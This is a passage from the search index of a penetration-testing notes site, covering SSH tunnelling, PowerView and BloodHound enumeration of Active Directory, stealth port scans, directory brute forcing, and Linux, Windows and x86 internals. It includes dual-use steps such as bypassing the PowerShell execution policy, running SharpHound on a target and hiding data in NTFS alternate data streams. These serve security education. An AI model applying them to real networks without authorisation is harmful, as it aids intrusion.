is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"217","title":"Remote Port Forwarding"},"218":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"218","title":"Active Directory (AD)"},"219":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"219","title":"Overview"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"220","title":"Get Domain Information"},"221":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"221","title":"Get Domain Controller Information"},"222":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"222","title":"Retrieve Domain Policy Information"},"223":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"223","title":"Get Users Information"},"224":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"224","title":"Get User Property Information"},"225":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"225","title":"Get Domain Machines"},"226":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"226","title":"Get Groups"},"227":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"227","title":"Get Group Policy Information"},"228":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"228","title":"Additional Resources"},"229":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"229","title":"Overview"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"230","title":"Setup"},"231":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"231","title":"Collecting Data for Bloodhound"},"232":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"232","title":"Viewing the Data"},"233":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"233","title":"Finding Relationships in the Data"},"234":{"body":"","breadcrumbs":"System Internals","id":"234","title":"System Internals"},"235":{"body":"","breadcrumbs":"System Internals » Linux","id":"235","title":"System Internals"},"236":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"236","title":"User ID"},"237":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"237","title":"Unified File System"},"238":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"238","title":"Symbolic Links"},"239":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"239","title":"Hard Links"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible type of permissions - read (r), write (x) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"240","title":"Permissions"},"241":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"241","title":"Set Owner User ID (SUID)"},"242":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way SUID but rather than the files executing with the privileges of the owning user, they execute with the effective GID the owning group. When set on a directory, any file created within that directory will automatically have their group ownership set to one specified by the folder. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"242","title":"Set Group ID (SGID)"},"243":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"243","title":"Sticky Bit"},"244":{"body":"The command line, is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"244","title":"Introduction"},"245":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. > err_file Redirect the command's standard error into err_file by overwriting it. >> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"245","title":"Input and Output Redirection"},"246":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"246","title":"Pipes"},"247":{"body":"","breadcrumbs":"System Internals » Windows","id":"247","title":"System Internals"},"248":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"248","title":"Introduction"},"249":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"249","title":"Objects"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"250","title":"Object Organisation"},"251":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"251","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"252":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"252","title":"Trusts"},"253":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"253","title":"Introduction"},"254":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"254","title":"System Internals"},"255":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. These objects are instances of the User class . User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"255","title":"Introduction"},"256":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"256","title":"Domain Users"},"257":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"257","title":"Introduction"},"258":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distributions groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"258","title":"Group Type"},"259":{"body":"There are three possible group scopes and once again must be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions only regarding resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"259","title":"Group Scope"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"260","title":"Default Groups"},"261":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is update in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"261","title":"Introduction"},"262":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"262","title":"Introduction"},"263":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS are Alternate Data Streams .","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"263","title":"Introduction"},"264":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"264","title":"Permissions"},"265":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tell you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"265","title":"Inspecting Permissions"},"266":{"body":"A not very well-known, yet interesting feature of NTFS are the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which makes them an easy way to hide data within legitimately looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is innominate and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"266","title":"Alternate Data Streams (ADS)"},"267":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"267","title":"Working with ADSs"},"268":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"268","title":"Reverse Engineering"},"269":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"269","title":"Program Anatomy"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exists, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from commmon URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes , and when removing data, the stack pointer augments . This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"270","title":"The Stack"},"271":{"body":"When a function is invoked, a stack frame is constructed. First, the function's arguments which do not fit into the registers are pushed on the stack, then the return address is also pushed. Following this, the value of a special register known as the base pointer (rbp) is saved onto the stack and the value inside the register is then updated to point to the location on the stack where we saved the base pointer. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough in keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"271","title":"Stack Frames"},"272":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an opertation code (opcode) and optional data that the instruction operates with. These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"272","title":"Instructions"},"273":{"body":"Moves the value inside one register to another: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"273","title":"mov"},"274":{"body":"Load effective address - this instruction calculates the address of its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will move rax+0x10 inside rdx.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"274","title":"lea"},"275":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"275","title":"add"},"276":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"276","title":"sub"},"277":{"body":"It performs XOR-ing on its operands and stores the results into the first operand: xor rdx, rax The and and or are the same, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"277","title":"xor"},"278":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"278","title":"push"},"279":{"body":"Increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes and stores the popped value from the stack into its operand: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"279","title":"pop"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. Use the following syntax for quering BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"Jumps to the address specified - used for redirecting code execution: jmp 